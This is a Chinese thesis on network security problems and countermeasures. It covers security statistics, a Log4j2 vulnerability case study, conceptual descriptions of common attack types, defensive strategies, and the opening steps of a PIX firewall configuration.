当前位置: 首页 > news >正文

网络安全问题及对策研究

摘 要

网络安全问题一直是近年来社会乃至全世界十分关注的重要性问题,网络关乎着我们的生活,政治,经济等多个方面,致力解决网络安全问题以及给出行之有效的安全策略是网络安全领域的一大目标。

本论文简述了课题的开发背景,描述和定义了网络安全的内容和范围,着重于根据网络安全问题频发的不同角度分析其原因,包活网络安全现状中出现的信息篡改、网络攻击、病毒传播或交易威胁等,从具体实例出发,详细描述了网络安全事件出现的问题,原因及后果。针对不同的网络安全问题,提出了可预防和解决网络安全问题的技术策略和管理方案,针对技术应用过程做了详细阐述。同时,搭建了网络安全仿真实验环境,完成了ARP欺骗攻击与防御测试、SQL注入攻击与防御测试以及防火墙配置之端口安全测试,将网络安全问题表现的具像化。最终达到为净化网络安全环境,提高网络安全防护提供参考。

关键词:网络安全问题,网络安全策略, 攻击技术, 防御技术

Abstract

Network security problem has been in recent years the society and even the world is very concerned about the importance of the problem, the network is related to our life, politics, economy and other aspects, to solve the network security problem and give effective security strategy is a major goal of the network security field.

This paper introduces the development background of the topic, describes and defines the content and scope of network security, focusing on the analysis of the different aspects of network security based on frequent its reason, package live network security status information in the complex change, network attack, the spread of the virus, or the threat of trading, starting from the concrete examples, describes in detail the network security problems, causes and consequences. In view of different network security problems, this paper puts forward the technical strategy and management scheme that can prevent and solve network security problems, and expounds the application process of technology in detail. At the same time, the network security simulation experiment environment is set up,and the ARP spoofing attack and defense test, SQL injection attack and defense test and firewall configuration port security test are completed, so that the network security problem

are embodied. Finally to purify the network security environment, improve network security protection to provide reference.

Keywords: network security problem, network security strategy, attack technology, defense technology

目 录

第1章 绪论1

1.1导论1

1.1.1 选题背景1

1.1.2 选题意义2

1.1.3 课题研究内容、要求及目标3

1.1.4 本章小节................................................................................................................4

第2章 网络安全现状

2.1 计算机网络安全概述5

2.1.1 计算机网络安全的含义5

2.2 网络安全现状5

2.2.1 政府网站安全情况不容乐观................................................................................5

2.2.2 遭受境外网络攻击持续增加................................................................................6

2.2.3 网上银行面临的钓鱼威胁愈发严重....................................................................6

2.2.4 木马和僵尸网络活动愈发猖狂............................................................................6

2.2.5 应用软件漏洞呈快速增长趋势............................................................................7

2.3 本章小结8

第3章 网络安全事件研究

3.1 近年网络安全事件概述.....................................................................................................9

3.2 重大网络安全问题.............................................................................................................9

3.3 案例多角度分析.................................................................................................................9

3.3.1 漏洞严重为最高级................................................................................................9

3.3.2 漏洞带来影响范围广时间长..............................................................................10

3.3.3 采取有效方案进行规制......................................................................................10

3.3.4 网络安全仍需警钟长鸣......................................................................................11

3.4 本章小结...........................................................................................................................11

第4章 网络安全分析12

4.1 网络安全内容12

4.1.1 网络安全需求......................................................................................................12

4.1.2 计算机系统安全12

4.1.3 信息系统安全13

4.1.4 网络交易安全14

4.2 网络安全面的威胁攻击.................................................................................................14

4.2.1 拒绝服务攻击......................................................................................................14

4.2.2 电子邮件攻击......................................................................................................15

4.2.3 缓冲区溢出攻击..................................................................................................15

4.2.4 网络监听攻击技术..............................................................................................15

4.2.5 IP欺骗攻击...........................................................................................................15

4.3 本章小结16

第5章 策略分析与解决方案.....................................................................................17

5.1 网络安全策略...................................................................................................................17

5.2 技术方案...........................................................................................................................17

5.2.1 防火墙技术................................................................................................................17

5.2.2 访问控制技术............................................................................................................19

5.2..3 数据加密技术...........................................................................................................22

5.2.4 入侵检测系统............................................................................................................24

5.2.5 防病毒技术................................................................................................................25

5.3 管理方案...........................................................................................................................27

5.3.1 完善法律法规监管制度............................................................................................27

5.3.2 加强互联网企业的网络监督力度............................................................................27

5.3.3 树立网络安全意识和防范意识................................................................................28

5.4 本章小结...........................................................................................................................28

  1. 模拟仿真测试................................................................................................29

6.1 ARP欺骗与防御测试.......................................................................................................29

6.1.1 ARP协议....................................................................................................................29

6.1.2 ARP协议工作原理....................................................................................................29

6.1.3 实验目的......................................................................................................................30

6.1.4 实验环境......................................................................................................................30

6.1.5 实验步骤......................................................................................................................30

6.2 SQL注入攻击与防御测试..................................................................................................38

6.2.1 SQL注入简介...............................................................................................................38

6.2.2 SQL注入原理...............................................................................................................38

6.2.3 实验目的......................................................................................................................39

6.2.4 实验环境......................................................................................................................39

6.2.5 实验步骤......................................................................................................................39

6.3 防火墙配置之端口安全测试...............................................................................................51

6.3.1 实验原理......................................................................................................................51

6.3.2实验目的.......................................................................................................................51

6.3.3 实验环境......................................................................................................................51

6.3.4 实验步骤......................................................................................................................51

6.4 本章小节.............................................................................................................................59

第7章 结束语60

致谢60

参考文献61

第1章 绪论

1.1导论

今时今日,网络世界的发展已经远超世界的脚步,但带来许多好处的同时也带来了许多网络安全问题,例如网络病毒的不断繁衍,黑客的不断攻击等现象时刻危及着人民,社会乃至国家的安危,尽管有关部门也反复强调加强网络安全建设和管理工作的重要性,但相关的硬件设施与技术支持也应跟上网络变化的步伐,充分了解目前网络安全环境中存在的重大问题,对症下药,是非常重要的一环。当下网络发展在国家和社会的各项建设中都发挥着巨大的作用,是信息传输的桥梁,确保网络的健康运行和良好的网络环境已经成为当前时代与社会不可回避的一个紧迫性问题。

1.1.1 选题背景

在这个信息化时代下,网络早已走进千千万万个家庭和企业,而信息网络的安全已经成为社会稳健发展的重要保证。2019年2月28日,中国互联网络信息中心显示,我国互联网网民总数已达8.29亿,互联网普及率为59.6%,网站总数高达523万个,可见网络的覆盖率如此之高。与此同时,人们的生活,娱乐乃至工作都越来越离不开网络,人们享受网络带来便利的同时,网络安全问题也成为了信息时代下人类共同的挑战。

1、相关领域的论文研究发表年度趋势

对于网络安全问题相关文献的年度发表趋势如下图1-1所示,2017年之前呈整体上升趋势,网络安全问题关注度较高,2018年开始呈下降趋势,图二为国家互联网应急中心2021年度发表的近十年互联网恶意程序捕获图,整体是大幅度上升的趋势,说明网络安全问题一直存在较大隐患,因而更应该持续关注网络安全发展问题,其具有一定的可行性和实际意义。

添加图片注释,不超过 140 字(可选)

图1-1 2012年至2021年网络安全问题相关文献发表年度趋势

添加图片注释,不超过 140 字(可选)

图1-2 2011年至2020年互联网恶意程序捕获数量走势

1.1.3 选题意义

1、研究的实践指导意义

近五年来,我国的网络发展趋势如雨后春笋,小到日常生活中的柴米油盐酱醋茶,都可搭乘网络的便利完成购买,大到物联网、5G、云计算等等技术已经悄无声息地潜入生活,教育和科技的方方面面。在网络时代,通过挖掘和分析大量数据,找出事物的一般发展规律,已经充分应用到了各行各业的发展中。例如在金融行业,利用网络交易安全和信息安全,可以规范信用借贷,减少交易违法;在互联网行业,利用网络数据分析,可以及时推送受众感兴趣的商品,完善平台的系统机制;在制造业方面,利用网络系统安全可以确保设备的正常运行,改进和优化生产工艺以及生产流程。总而言之,网络安全问题的不断推进在社会的发展进程中有着实质性的重要意义。

2、研究的理论意义

随着人们的生产生活日益多元化,网络也成为我国乃至世界关注的一大焦点。但随着网络规模的急剧膨胀,许多问题也随之而来,尤其是网络安全技术以及运营意识都存在一定的滞后性,导致网络安全问题日益频发,所以,许多学术界,理论界都越来越致力于网络安全问题的研究和探讨。从网络安全的技术层面来看,不断完善推进系统安全技术的开发与实现是保证网络安全的夯实基础,同时也需要强大的理论支撑去创造和维护良好的网络环境。从网络安全管理层面来看,超前的管理意识和防患于未然的管理建设都是保证网络安全健康运行的重要因素。将网络安全技术更加先进化,有效化,将网络安全管理更加完善化,系统化,将网络安全意识更加普及化,大众化,均是推进网络安全问题不断前进的重要步骤,同时也是我们共同面临的更大的时代性挑战。

1.1.4 课题研究内容、要求及目标

1、研究内容

通过前期的分析,课题研究将着重于网络的系统安全、信息安全和交易安全三大方面,以拒绝服务攻击、电子邮件的攻击、缓冲区溢出攻击、网络监听攻击技术以及IP欺骗攻击等网络安全问题来进行深入的探讨和研究,主要研究为以下几个方面:

(1)了解当下网络安全现状和出现的问题,以出现过的或正在出现的网络安全问题为实例,分析现象,进行对比,找出共同点。

(2)分析网络安全问题背后出现的具体原因,按照类别进行梳理和归纳。

(3)按照技术层面与管理层面给出相应的技术策略和管理策略,增强网络安全意识。

(4)搭建网络安全问题仿真测试环境,进行不同方面的攻防测试,从不同角度理解网络安全问题。

2、目标

本课题最终将达到如下几个目标:

(1)分析现状,参考实例

(2)找出问题,分门别类

(3)给出策略,加强管理

(4)测试技术,安全可行

1.2 本章小结

这一章节是对选题的背景、意义、课题的要求、研究内容、要求以及目的的简要说明,这些都是论文研究的前期基础。


第2章网络安全现状

2.1 计算机网络安全概述

2.1.1 计算机网络安全的含义

上个世纪六十年代产生了互联网,建立起了人与世界联系的桥梁,经过互联网的逐渐壮大,网络在人们的生产生活中扮演着越来越重要的角色,甚至可以说已经离不开互联网。

网络安全包括系统硬件和软件的保护,也就是指当出现意外因素时,系统也可以在保护下正常运行,不会出现数据被泄露或篡改,系统被恶意操作等现象,因此,数据的完整性、保密性和真实性得到了保障。简单来说,即要保护网络中信息的真实性与完整性[1],可以随时被提取但同时保证其保密性。网络安全可以分为三大类别,依次是网络系统安全,网络信息安全和网络交易安全。

2.2 网络安全现状

2.2.1 政府网站安全情况不容乐观

据《2021年上半年我国互联网网络安全监测数据分析报告》,国家互联网应急中心发布的信息显示目前已有34000个网站遭到了恶意攻击,可见数量之庞大,其中政府网站被恶意篡改的达177个,总体仍处于较高数量。另外根据我国境内网站遭遇网页篡改的顶级域名分布情况来看,占比高居前三的分别是“.com”“.net”以及“.org”,占比百分比分别为73.5%、5.4%和1.8%。

除了网页篡改情况不容乐观以外,网页仿冒的情况也较为严重。CNCERT监测数据显示,恶意针对我国境内网站进行页面仿冒的有将近1.3万个,尤其在今年2月份以来,地方农信社网站的仿冒页面呈现爆发的趋势,并且仿冒对象在不断地更换和转移,承载的IP地址大多位于境外。他们通过仿冒页面数次改变银行名称,并且大多数为新注册的域名,最后通过假基站发送钓鱼短信的方法进行不良传播。这种恶意仿冒页面,会使攻击者不法获取受害者私密信息,或者用受害者的身份信息登陆受害者的网上交易系统进行汇款,诈骗或者绑定自己的支付渠道将其资金盗取。

2.2.2 遭遇境外网络攻击持续增加

2021年,我国境内计算机遭恶意程序感染的数量约乎446万台,同比增长了46.8%,数字可观。在这些主机中,大约有49,000个国外的电脑恶意程序,在国内控制了大约4100,000个主机。从被恶意软件控制的服务器的分布来看,美国,越南,中国香港控制服务器数量最为繁多。这些数据均显示我国境内主机近年持续遭受境外恶意程序控制,严重威胁了我国境内的网络安全。

2.2.3 网上银行面临的钓鱼威胁愈发严重

近年来,国家网上银行的发展具有蓬勃生机,而这背后却是众多网上银行用户遭受黑客攻击,变成了他们的一大目标。网络钓鱼是目前为盗取用户敏感数据的一种常用手段,攻击者的重点目标就是各大金融行业的专用网站,他们窃取金融用户的隐私信息后,通过发送垃圾邮件或手机讯息向用户传达虚假欺骗信息,诱导受害者打开伪造的金融网站的钓鱼界面,从而窃取受害者的账号和密码,进行一些资金的转存或非法交易,导致受害者遭遇巨大利益损失。这种现象的出现让广大的网银用户处于危险境地,也让网络交易安全面临更大的威胁。

2.2.4 木马和僵尸网络活动越发猖獗

据国家互联网应急中心数据显示,自2011年来,他们在国内发现890万台电脑的IP被木马或僵尸病毒感染。大约56,000个国家、互联网公司和个人主机的IP地址遭受木马感染,使多方信息安全遭遇不安现状。与此同时,我国计算机被恶意程序感染的数量也非常庞大,处于较高数量。木马和僵尸网络活动越发猖狂的原因一方面是黑客或不法分子不断利用新的手段或攻击方式制造不同的恶意程序,另一方面他们利用一些法律法规的漏洞逃避监测和打击,使得安全机构的防范力度不断加大。

2.2.5 应用软件漏洞呈快速增长趋势

国家信息安全漏洞共享平台在2011年上半年进行了通用型安全漏洞的收录,数量高达13083个,相比较于2020年同比增长了18.2%。在这其中,同比大幅增长的漏洞是“零日”漏洞,增幅比是55.1%。通过影响分类统计显示,影响力度和范围最大的安全漏洞分别是应用程序漏洞、Web应用漏洞和操作系统漏洞。而在2021年上半年度,国家信息安全漏洞共享平台共处理网络安全漏洞问题将近1.8万个,其中均跟政府机构和重要信息系统有重大关联。这严重威胁了我国经济,政治或者军事等层面的国家网络安全,不容小觑。

2.3 网络安全遭遇威胁的隐患和后果

2.3.1 系统崩溃

网络系统运行中导致系统崩溃或瘫痪的原因有多种,黑客攻击、病毒破坏、或是操作不当等都会引起系统出现故障或是无法正常运行。若专业人员或用户操作不当,例如配置问题、安全意识不足或者口令选择错误等行为,都会造成系统被非法入侵或篡改,导致系统内部的信息被泄露或盗取,给网络安全带来威胁,造成不良后果。

2.3.2 黑客攻击

非授权访问也就是说在未经网络允许的状况下使用网络或计算机资源,其表现有:假冒、身份攻击、非法用户入侵、合法用户进行非法操作等[2]。以上行为常常是黑客的惯用伎俩,以此来进行一些非法破坏行为。除此之外,一些新信息技术在为我们创造生活便利的同时,也容易让黑客趁虚而入,当系统安全出现不易察觉的漏洞时,黑客便会趁机而入,利用一些不易让人察觉的手段进行恶意入侵和攻击等行为。比如,攻击者常使用一种叫做“IP spoofing”的入侵手段,冒充原用户的IP地址,非法入侵内部网络,破坏或窃取网页内容以及数据信息,甚至会导致服务器瘫痪或崩溃,最后无法正常运行。

2.3.3 病毒破坏

电脑病毒可以说是无所不在,《中华人民共和国计算机信息系统安全保护条例》于一九九四年二月十八日正式颁布,其中对电脑病毒作了一个很清楚的界定:电脑病毒是一套指令或代码,用于损坏信息数据或电脑,且其可以进行自我复制。

病毒最大的特点是具有超强的感染力,其显著特征有:

  1. 寄生性

  2. 传染性

  3. 潜伏性

  4. 隐蔽性

  5. 破坏性

  6. 可触发性

这些特点会导致病毒很难被察觉出来,若隐若现,变化无常,或是察觉出来时已经爆发,对系统产生巨大的破坏力。而破坏力的具体表现为导致部分程序无法正常运行,计算机内的文件遭到删除或不同程度的损坏,可以概括为增、删、改、移。

2.4 本章小结

本章主要对当前网络安全现状进行了概括和归纳,具体阐述分析了网络安全现状中出现的不同问题,有攻击层面的问题,商业利益方面的问题以及用户个人信息的问题。最后概括了安全问题出现会导致的隐患和后果,为之后分析网络安全技术层面打下基础。


第3章网络安全事件

3.1 近年网络安全事件概述

经研究数据表示,近年来不论国内或是国外网络安全环境变化波动非常之巨大,小到软件诈骗,大到商业勒索,无一不是对网络安全底线的步步紧逼。

2021年网络安全热点大事件超越几十余起,例如数据泄露事件中疑似超2亿国内个人信息在国外暗网论坛兜售,其中出售数据包括身份证、性别、姓名、出生日期、手机号甚至家庭住址等极具隐私的内容,严重威胁了公民的人身安全和隐私安全。网络攻击事件中澳门特区政府卫生局遭到恶意网络攻击,严重影响了健康码、医疗券、新冠病毒疫苗和核酸检测等系统的正常运作,扰乱了公共秩序,危害严重。

3.2 重大网络安全问题

阿帕奇Log4j2组件重大安全漏洞事件

2021年11月24日,阿里云在web服务器软件阿帕奇下的开源日志组件Log4j2内,发现重大漏洞Log4Shell,然后向总部位于美国的阿帕奇软件基金会报告。获得消息后,奥地利和新西兰官方计算机应急小组立即对这一漏洞进行预警。新西兰方面称,该漏洞正在被“积极利用”,并且概念验证码也已被发布。

12月9日,阿帕奇官方发布紧急安全更新以修复远程代码执行漏洞,漏洞利用细节公开,但更新后的ApacheLog4j2.15.0-rc1版本被发现仍存在漏洞绕过。与此同时,中国工信部收到有关网络安全专业机构报告,发现阿帕奇Log4j2组件存在严重安全漏洞,立即召集阿里云、网络安全企业、网络安全专业机构等开展研判,并向行业单位进行风险预警。12月10日,中国国家信息安全漏洞共享平台发布《Apache Log4j2远程代码执行漏洞排查及修复手册》,供相关单位、企业及个人参考。12月22日,工信部通报,由于阿里云发现阿帕奇严重安全漏洞隐患后,未及时向电信主管部门报告,未有效支撑开展工信部开展网络安全威胁和漏洞管理,决定暂停该公司作为工信部网络安全威胁信息共享平台合作单位6个月。

3.3 案例多角度分析

3.3.1 漏洞严重性为最高级

一般在评估漏洞危害程度时需考虑以下三个因素:攻击者利用漏洞的难度、漏洞利用对目标机器带来的危害、漏洞的影响范围。而阿帕奇漏洞被认为是近年来最大的高危型计算机漏洞。首先,攻击者通过JNDI注入攻击的形式便可轻松远程执行任何代码,利用方式十分简单;其次,黑客可利用该漏洞直接获得目标机器的最高权限(root权限),导致远程设备受控,进而引发敏感信息窃取、设备服务中断等严重危害;此外,该漏洞影响范围极其广泛,波及到全球数亿台网络设备。

据了解,阿帕奇工具几乎存在所有JAVA应用程序中,而全球有数以亿计的设备安装有JAVA程序,因此所有行业都会受到该漏洞的影响。根据当前国内外安全厂商披露的清单,当时检测到利用漏洞进行的攻击活动,最多的是挖矿木马团伙,其次是勒索软件,也不乏有针对高价值目标的APT攻击(高级持续性威胁)。

3.3.2 漏洞带来影响范围广时间长

阿帕奇Log4j2组件本身是一个开源项目。开源软件提高了开发效率,加速了互联网应用的普及,但同时也引入较多的安全风险。由于Apache log4j组件的涉及面很广,大量网络业务系统构建在其基础上,若基础出现问题,可能会影响全局。

传统的漏洞扫描引擎仅依据软件名称及版本号来确定是否存在漏洞,而实际上,开源软件通常会有多个版本分支同时并行,同一个漏洞在不同的版本分支中实际受影响的状态也不同。由此可见,精准识别漏洞并有针对性地对其进行修复并非易事。另外,攻击者也不断探索新的漏洞利用模式,因此,专家称阿帕奇漏洞的影响可能会持续数十年时间。

3.3.3 采取有效方案进行规制

《网络安全产品漏洞管理规定》由工业部、国家互联网信息办公室、公安部联合印发,2021年9月1日起正式实施。条例第2条:在中华人民共和国境内,提供网上商品的人员和经营管理网络的人员,包括个人或团体中发现、收集或者买卖网上产品安全的人,应该严格遵守此条法规。

而《网络安全产品漏洞管理规定》中第七条规定提供网络产品的人在发现产品的安全漏洞后有验证、评估、通知、报送、修补、告知义务,但阿里云公司正是因为没有履行“报送义务”,直接导致了此次阿帕奇漏洞事件的发酵。这也是《规定》实施以来,社会影响力最大的案件。

工信部暂停阿里云公司作为工信部网络安全威胁信息共享平台合作单位6个月是属于象征意义上的“警告”措施,并不属于法定处罚措施,《规定》中没有明文规定如何处罚,因此行政机关在履行其法定职责时,也要遵循行政法律法规的合规要求,对于没有法律明文规定处罚措施的违规行为,行政机关也不能滥用权利予以处罚。

从此次网络安全漏洞事件中,被处罚者(阿里云公司)作为关键信息基础设施运营者,其掌握的数据信息与国家安全息息相关,但其没有按照《管理规定》的流程履行报送义务,说明该主体内部缺乏合规流程。这也给许多互联网企业敲响了警钟,从互联网企业合规运作的角度来看,涉及重要数据、敏感信息的出境问题,应当慎之又慎,做好前期预案,逐步建立起互联网企业网络安全合规管理体系,避免再次出现此类违规事件。

3.3.4 网络安全仍需警钟长鸣

实际上,阿帕奇漏洞的出现并非偶然。根据Gartner的相关统计,到2025年,30%的关键信息基础设施组织将遇到安全漏洞。安全漏洞总会出现,无法根本上杜绝。在被发现之前,无法推测其存在,也无法预料其后果。对于一般客户而言,需要特别关注相关威胁情报信息;企业最好有专业安全运维队伍来做保障;政企机构需要建设具有弹性的完整安全解决方案,去实时监测、响应、处置各类安全威胁;运维人员更要高度关注高危漏洞信息,及时修补漏洞或采取相应的缓解措施控制风险。

阿帕奇漏洞事件只是网络安全世界事件中的冰山一角,但为我们敲响了网络安全的警钟,不论是用户还是企业,都应该未雨绸缪,防患于未然。未来在基于开源架构打造软件、构建系统的同时,应该如何更好地保障系统安全、防范和控制软件风险,如何更好地利用和使用开源架构,都需要社会各界的关注和思考。

3.4 本章小结

本章主要以阿帕奇漏洞事件为例,进行阐述,论证和分析。从典型网络安全事件的角度出发,浅析了事件中各方的行为和政策措施,从点到面,可以在这个事例中看出当前网络安全问题中存在的问题和不足之处,以此为鉴。


第4章 网络安全分析

4.1 网络安全内容

网络安全包含多个方面:通信安全、信息安全、物理安全、人员安全、操作安全、计算机安全、工业安全和电磁辐射安全等。总的来说,网络安全的任务即确保每个网络资源具有稳定性和可靠性,并且能够合法使用和正常运行,与此同时,网络信息还具有以下特点;

  1. 机密性

  2. 完整性

  3. 可用性

  4. 真实性

  5. 可控性

  6. 可审查性

而保证网络信息的以上特点也是网络安全的任务之一。除此以外,考虑病毒防止以及防范内部犯罪行为同样是网络安全的任务范围。

网络安全涉及的领域非常广泛,包括计算机技术、网络通信技术、信息安全技术、加密技术均在其研究范围内,甚至社会学科中的应用数学、统计学、法律和社会学等多个学科也有波及,也就是说,只要与网络信息数据的真实性、机密性、完整性、可用性、可控性和可审查性这几个特点相关联[3],都在网络安全研究的范围之内。

4.1.1 网络安全需求

计算机安全运作的目标就是运用适当的安全技术与安全管理策略,在相关法律、法规的支撑和保护下,实现下列要求:

1、利用加密机制,使得未经授权的主体或程序看不懂信息和数据,从而达到保密目的。

2、利用数据完整性认证机制,数据必须经过许可方可更改,否则不能更改,以确保数据的完整性。

3、采用访问控制机制,有效防止未经授权使用者的进入,减少了被攻击的风险,并保证了系统的安全度。

4、采用授权机制对用户的访问权限进行控制,并将其与内容审计机制结合起来[4],以达成对网络资源、信息数据的监控。

5、采用审计、监控等安全机制,对现存在的网络安全问题和潜在的安全问题进行研究,确保信息安全所具有的可审查性。

4.1.2计算机系统安全

计算机系统的应用程序中储存着大量的数据信息以及文件资料,自然包括众多机密文件。如果计算机系统突发安全问题,会导致用户的严重损失。系统硬件问题、数据处理问题、病毒入侵问题以及人为破坏等均会导致计算机系统安全问题频发,给计算机系统安全带来重大威胁。

1、计算机系统的特点

计算机系统具有以下三个显著特点:

  1. 完整性

  2. 保密性

  3. 有效性

完整性是指在分享或传送时,防止资料遗失、变更及损坏;保密性是指在系统中能够阻止他人对信息进行盗用,从而增强了数据传输的安全性;有效性是指通过权威性的签字来确定信息有效,计算机报文系统具备了数字签名的功效,从而确保了文件的有效性。

2、计算机系统安全问题

计算机系统的安全性问题通常包括下列情况:

硬件的安全性问题。由于计算机本身的不稳定,或者发生了电压变化等,会对计算机的工作产生一定的影响,可能导致系统的瘫痪、崩溃,从而为非法入侵提供了机会。

软体的安全性问题。如果用户操作不到位,或者由于系统的安全问题,不管是人为的,还是被强行入侵,都会导致软件的数据和信息被破坏或丢失。

病毒的入侵问题。病毒入侵对电脑系统的安全构成了一个巨大的威胁,它的传播速度很快,影响范围很大,包括对程序代码的篡改以及漏洞的感染,都可能导致数据的破坏或丢失甚至系统瘫痪。

黑客的入侵问题。攻击者非法进入系统对系统进行攻击和破坏等行为,会直接造成系统无法正常运行,更无法保证系统内部软件和信息的安全性。

4.1.3 信息系统安全

从上个世纪八十年代到九十年代,信息系统的安全性得到了极大的发展,它通过防火墙、防病毒以及VPN等技术手段来保证信息在存储、处理以及传输时不被未经许可的访问者使用,阻止授权用户的拒绝服务,并采用包括检测、记录和应对这些威胁的措施。网络攻击、信息对抗以及病毒是目前网络安全的主要威胁。由此导致出现的信息系统安全问题有以下几种:

1、信息数据访问权限混乱

如今的网络就是大量数据的集中地,所以安全防护也变得逐渐困难,信息泄漏风险越来越高。基于这个前提下,网络数据的访问控制系统越来越复杂。大多数情况下,数据访问权限的许可是由管理员所决定的,能否访问该网站取决与是否获得访问权限,若取得访问权限则可以获得对应权限下的信息数据,反之则无法对该网站进行访问。但与此同时,网络信息数据的发展趋势太过快速,访问权限的控制度已远远落后于发展需求,导致出现信息数据访问权限的不规范化现象,访问权限的范围变得模糊不清,而不法分子则趁火打劫,非法进行访问,盗取或恶意散播网络信息数据,扰乱网络安全秩序,为网络环境埋下不安全因素的种子。

2、数据信息的泄露

日常生活中,大家利用网络进行购物、买票、缴纳水电费等,于是大量数据的集中吸引了黑客的注意力,他们会利用“撞库”的方法去获得用户的姓名,电话,地址或者身份证号等信息,以此来获得不法利益。除了不法分子之外,有部分恶劣商家也会对用户信息进行截获,利用有用的信息来追求利益。甚至在大型企业或市场中,未经个人授权的信息也会被滥用,他们将信息进行出售或倒卖,以此谋取暴利。

3、病毒安全性问题

在人们的常规认知中,“病毒”是网络安全问题的最大诱因。病毒的类别十分庞杂,主要包括木马病毒、系统病毒、蠕虫病毒、脚本病毒、后门病毒、破坏性程序病毒等[5]。木马病毒是日常生活中大家比较耳熟能详的一种,这种病毒主要以盗取用户信息为主要目的。病毒对数据有着非常强大破坏力度,往往表现为格式化硬盘、删除文件数据、狂发垃圾邮件或信息等行为,这些都还只是病毒带来安全问题的冰山一角,总之病毒对网络信息系统造成的危害不可估量,不能掉以轻心。

4.1.4 网络交易安全

1、不法分子的恶意攻击

随着数据时代的发展,网络连接着众多外部节点,随着智能终端的增多,海量的数据都可以通过智能终端进行共享,而智能终端最大的优点就是在手机中储存大量的信息,便于我们随时携带和使用,但除此之外,移动终端亦会成为黑客攻击的目标[6],容易导致信息被窃听,甚至有些会冒充合法用户进行欺骗诈骗等违法行为,伤害用户的利益。

2、用户缺乏网络安全意识

上至老人,下至小孩,当前可以说是一个网络全民化的时代,越来越多的用户开始使用网络进行交易,各种买卖也层出不穷,必然导致个人利益的不安全性。有时用户缺乏对网络安全的了解,安全防范意识薄弱,主要体现在密码保护上,过于简单化非常容易导致个人利益被侵犯。

4.2 网络安全面临的威胁攻击

4.2.1 拒绝服务攻击

拒绝服务攻击(Denial of service)是一类常见的攻击方法,其主要针对的是服务器。其目的是找到一种方法,使目标计算机无法继续提供服务。拒绝服务攻击的范围包括但并不局限于对网络宽带的消耗,只要能够给目标主机造成困扰,致使其服务中断,甚至导致故障,均属于“拒绝服务”攻击。

拒绝服务攻击的集群攻击方式是分布式拒绝服务攻击,指在同一时间使多台计算机遭受攻击,同样使攻击的目标无法正常运行。

Dos攻击的原理是在进行攻击的时候伪造源IP地址,服务器等不到消息的回传,也就无法释放分配给这次请求的资源,且在过了一段时间之后,服务器就会因为超时而中断,攻击者在这时又会重新发送一批新的请求,循环往复,服务器的资源就会枯竭殆尽,从而无法再处理合法用户的请求。

4.2.2 电子邮件攻击

电子邮件攻击又可以被称为邮件炸弹攻击,是当前最常见的商业攻击手段[7]。其攻击手段是向一个或多个信箱发送大量的垃圾信息,从而增加了网络的处理时间,并使系统内的资源枯竭殆尽,迫使整个系统瘫痪。

邮件炸弹软件有很多种,它们的使用方式各不相同,但是它们的共同点就是可以让攻击者无法察觉。

4.2.3 缓冲区溢出攻击

缓冲区溢出攻击是一类十分普遍的风险漏洞,其主要目的是针对缓冲区溢出漏洞发起攻击。这种攻击技术广泛地存在于不同的操作系统和应用程序中,这种技术可能会引起一些严重的问题,如程序的运行不畅、关闭或者重启等后果[8]。

4.2.4 网络监听攻击技术

网络监听技术是旨在信息数据传输过程中,通过多种方式将网络界面设置为监视状态,捕获并截获网络中的传播信息,从而实施攻击。在任意一种状态下,都可以进行网络窃听,通常情况下黑客利用这种技术获取用户账号和密码。这种攻击手段可以将窃听的范围扩展到某个主机所在的局域网,通常是黑客们最爱的选择。

4.2.5 IP地址欺骗攻击技术

IP地址欺骗技术是将行为所产生的 IP信息作为一个虚假的 IP地址,用来伪装成其它系统或发送者的一种身份,也就是说,所显示的数据信息源并非真实来源,仿佛该数据信息来自另外一部电脑,这也是黑客使用的一种攻击形式。容易被这种技术攻击的服务有:用IP地址认证当作用户身份的服务、x window system和远程服务系列(如远程访问服务)。

4.4 本章小结

本章主要分析了网络安全问题中最主要的三大方面问题,将每个不同层面中的问题展开具体分析,尽可能全面地找出当前网络安全中存在的问题,为之后的策略方案提供现实依据和基础。


第5章策略分析与解决方案

5.1 网络安全策略

网络安全策略是一组必须遵循的规则,以确保给定环境中的安全性。安全策略模型包括以下用于创建安全环境的三个关键需求:

领先的安全技术:领先的安全技术是保证网络安全的重要基石。在面对威胁时,可以根据自己的需求,选择适合自己的安全服务类型以及安全机制,并将其整合到一起[9]。

有效的法律法规:国家法律法规是安全的基础。本部分用于制定一套安全管理标准和程序,以防止受到非法行为的干扰。

严格的管理制度:互联网组织、企业、各单位要加强对网络的管理,提高对专业人员的要求,增强对网络的认识和对网络的保护。

5.2 技术方案

5.2.1 防火墙技术

防火墙技术是一类以互联网为基础还以信息安全为基础的应用型安全技术,基于网络技术和信息安全技术的应用安全技术。预设的保护形式是“内、外网安全集成”的网络保险方式。也就是由防火墙去承担内部的网络安全。在维护网络安全的同时,完成对外部输入的管理和数据的传输和限制。我们通过硬件和软件支持提供全面的数据保护和安全服务。

  1. 校园网防火墙应用案例

以保证校园网安全为目的,拿防火墙技术为例。该方法能有效地保护校园网络和系统,针对校园网的安全性要求,对通过防火墙的数据进行追踪,使其能够启动或禁止数据包的转发,从而防止内部网中的资源遭到恶意攻击。同时也能保证从互联网到 Extranet的常规网络接入和 FTP下载功能。为了达到校园网的安全目的,在因特网与校园网这两者间建立起一道防火墙,并在内网与外网间建立起一道坚固的防护屏障。于此同时,在非安全性系统和安全性系统间,还设置了一个 DMZ缓冲, WWW、E-mail和 DNS服务器均与此相连。避免了内网和外网之间的直接通讯,提高了局域网的安全性[10]。图1-3 网络的防火墙拓扑图。

添加图片注释,不超过 140 字(可选)

图1-3 防火墙在网络系统中的拓扑结构

防火墙采用最新架构和硬件平台,可广泛应用于智能、政务等千兆网络环境。 防火墙的迅速执行不会对系统的策略、事件的数目、入侵的探测、对攻击的探测以及对问题的处理能力等产生影响。其提供并支持外部攻击防御,深度状态控制,流量监测,网站分析等,以保证网络的安全性。提供有效的路由选择和路由策略。该系统能够有效地防范大部分的恶意攻击,最大限度地满足了校园网的稳定要求。

详细的配置流程如下:

  1. 给PIX命名,添加有效的密码,完成手机密码的设置,且指定可以telnet到PIX的主机IP地址。

  2. 命名且定义DMZ接口、内部接口(e1 security100)和外部接口(e0 security0)。设置默认安全级别。

Pix(config)#nameif ethernet2 dmz sec50

(3)添加 IP 地址到接口

Pix(config)#ip address outside 1.1.1.1 255.255.255.0

Pix(config)#ip address inside 192.168.1.1 255.255.255.0

Pix(config)#ip address dmz 192.168.2.1 255.255.255.0

(4)默认接口是 shut down 的。使用 interface 命令来使能物理接口并设置接口速率和双工模式。

Pix(config)#interface e0 auto

Pix(config)#interface e1 auto

Pix(config)#interface e2 100full

